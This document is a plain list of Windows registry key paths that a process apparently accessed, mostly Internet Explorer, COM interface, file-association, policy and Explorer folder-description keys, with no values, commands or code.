HKEY_CURRENT_USER\Software\Classes\Interface\{D30C1661-CDAF-11D0-8A3E-00C04FC9E26E}\TypeLib
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D30C1661-CDAF-11D0-8A3E-00C04FC9E26E}\TypeLib\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D30C1661-CDAF-11D0-8A3E-00C04FC9E26E}\TypeLib\Version
HKEY_CURRENT_USER\Software\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1\0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1\0\win32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1\0\win32\(Default)
HKEY_CURRENT_USER\Software\Classes\TypeLib
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\UDTAlignmentPolicy
HKEY_CURRENT_USER\Software\Classes\Interface\{48A98A1F-5CDD-47EE-9286-DB04A3EB7CE1}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{48A98A1F-5CDD-47EE-9286-DB04A3EB7CE1}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{48A98A1F-5CDD-47EE-9286-DB04A3EB7CE1}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{6D5140C1-7436-11CE-8034-00AA006009FA}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6D5140C1-7436-11CE-8034-00AA006009FA}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6D5140C1-7436-11CE-8034-00AA006009FA}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{B722BCCB-4E68-101B-A2BC-00AA00404770}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{B722BCCB-4E68-101B-A2BC-00AA00404770}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{B722BCCB-4E68-101B-A2BC-00AA00404770}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\OleAut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Use FormSuggest
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Main
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\Use FormSuggest
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_USERS\S-1-5-21-120665959-548228820-2376508522-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-120665959-548228820-2376508522-1001\ProfileImagePath
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
\xe7\x9d\xa0\xc3\xa1EY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Wpad
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A10
HKEY_CLASSES_ROOT\MIME\Database\Content Type\image/x-icon
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\image/x-icon\Extension
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\QuickTabsLastUsed
HKEY_CURRENT_USER\Software\Classes\Interface\{9706DA66-D17C-48A5-B42D-39963D174DC0}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9706DA66-D17C-48A5-B42D-39963D174DC0}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9706DA66-D17C-48A5-B42D-39963D174DC0}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{5C193B57-4EC0-4387-B98E-BEBF10136422}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{5C193B57-4EC0-4387-B98E-BEBF10136422}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{5C193B57-4EC0-4387-B98E-BEBF10136422}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing\UseMRUSwitching
HKEY_CLASSES_ROOT\.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\(Default)
HKEY_CLASSES_ROOT\.exe\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\OpenWithProgids
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\UserChoice
HKEY_CLASSES_ROOT\exefile
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\CurVer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\ShellEx\IconHandler
HKEY_CLASSES_ROOT\SystemFileAssociations\.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\ShellEx\IconHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.exe\Content Type
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\Clsid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\AlwaysShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NormalizeLinkNetPidls
HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\System.NamespaceCLSID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\{28636AA6-953D-11D2-B5D6-00C04FD918D0} 6
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameShutdownDelay
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FrameShutdownDelay
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\Version
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchScopes\DownloadUpdates
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\User Preferences
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\User Preferences\2D53CFFC5C1A3DD2E97B7979AC2A92BD59BC839E81
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\User Preferences\88D7D0879DAB32E14DE5B3A805A34F98AFF34F5977
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IETld\StaleIETldCache
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\ClearableListData
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Control Panel
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Control Panel
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Privacy
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Privacy\ClearBrowsingHistoryOnExit
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\crypt32
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DebugHeapFlags
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DisableImprovedZoneCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\DEPOff
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLESAFESEARCHPATH_KB963027
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ENABLESAFESEARCHPATH_KB963027
HKEY_LOCAL_MACHINE\Software\Policies
HKEY_CURRENT_USER\Software\Policies
HKEY_CURRENT_USER\Software
HKEY_LOCAL_MACHINE\Software
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Low Rights
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ProtectedModeOffForAllZones
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\TabProcGrowth
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\TabProcGrowth
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Low Rights
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\LuaOffLoRIEOn
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FrameMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FrameMerging
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SessionMerging
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\SessionMerging
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\AdminTabProcs
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\AdminTabProcs
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\New Windows
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\New Windows\DetourDialogs
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\New Windows
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\AcRedir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesMyComputer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoPropertiesRecycleBin
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\iexplore.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\TabShutdownDelay
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\TabShutdownDelay
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SQM
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SQM\ServerFreezeOnUpload
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\SQM
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SQMClient\Windows
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1777F761-68AD-4D8A-87BD-30B759FA33DD}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Favorites
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA\AccessProviders
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Desktop
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Roamable
